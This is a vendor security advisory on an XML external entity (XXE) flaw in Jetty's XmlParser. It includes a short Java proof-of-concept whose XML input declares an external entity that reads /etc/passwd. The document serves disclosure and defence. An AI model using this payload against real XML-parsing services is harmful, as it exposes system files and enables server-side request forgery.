JFrog Security Research
< Back

XRAY-523189 - Jetty XmlParser XXE

JFrog Severity:medium

Discovered ByUriya Yavnieliof the JFrog Security Research Team

Published 12 Jul, 2023 | Last updated 12 Jul, 2023

Jetty XmlParser is vulnerable to XML external entity (XXE) vulnerability


(,) Currently no fixed version

XmlParser is vulnerable to XML external entity (XXE) vulnerability. XmlParser is being used when parsing Jetty’s xml configuration files. An attacker might exploit this vulnerability in order to achieve SSRF or cause a denial of service. One possible scenario is importing a (remote) malicious WAR into a Jetty’s server, while the WAR includes a malicious web.xml.

This is not considered a vulnerability of the Jetty server itself, as any such usage of the Jetty XmlParser is equally vulnerable as a direct usage of the JVM supplied SAX parser.

However, any direct usage of the XmlParser class by an application may be vulnerable. The impact would greatly depend on how the application uses XmlParser, but it could be a denial of service due to large entity expansion, or possibly the revealing local files if the XML results are accessible remotely.

package com.example;

import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;

import org.eclipse.jetty.xml.XmlParser;
import org.eclipse.jetty.xml.XmlParser.Node;
import org.xml.sax.SAXException;

public class App 
    public static void main( String[] args )
        XmlParser xmlParser = new XmlParser(true);
        String xmlContent = "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY > <!ENTITY xxe SYSTEM \"file:///etc/passwd/\" >]><foo>&xxe;</foo>";
        InputStream targetStream = new ByteArrayInputStream(xmlContent.getBytes());
        try {
            Node node = xmlParser.parse(targetStream);
        } catch (IOException e) {
        } catch (SAXException e) {



< Back